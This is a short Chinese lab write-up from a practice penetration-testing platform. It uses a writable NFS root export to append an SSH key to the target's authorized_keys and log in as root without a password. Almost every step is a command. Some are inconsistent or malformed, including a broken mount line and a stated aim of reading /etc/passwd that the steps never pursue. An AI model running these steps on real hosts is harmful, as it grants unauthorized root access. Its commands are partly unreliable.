声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。
[实验目的]
1) 利用 NFS共享目录配置漏洞读取目标主机的/etc/passwd文件内容
[实验原理]
1) NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登录。
[实验环境]
[实验步骤]
一、利用nmap工具扫描目标主机
1.1 在终端中输入命令“rpcinfo -p 192.168.1.3”,查看目标主机上nfs服务是否开启。
1.2 在终端输入命令“ showmount -e 192.168.1.3 ” 显示指定的远程共享目录列表。
1.3 在终端输入命令 "ssh-******",生成rsa公钥:
#一路回车
1.4 在终端输入命令 "mkdir /tmp/tool",建立tool目录;在终端输入命令"mount -t nfs 192.168.1.3:/tmp/tool,把192.168.1.3"根目录挂载到/tmp/tool目录下:
1.5 在终端输入命令"cat /root/.ssh/id_rsa.pub>>/tmp/tool/root/.ssh/authorized_keys ",把生成的公钥追加到靶机的authorized_keys下,实现ssh免密码登录:
1.6 在终端输入命令"ssh [email protected]"
1.7 在终端中输入命令"ifconfig eth0"查看目标主机IP信息。
NFS默认端口2049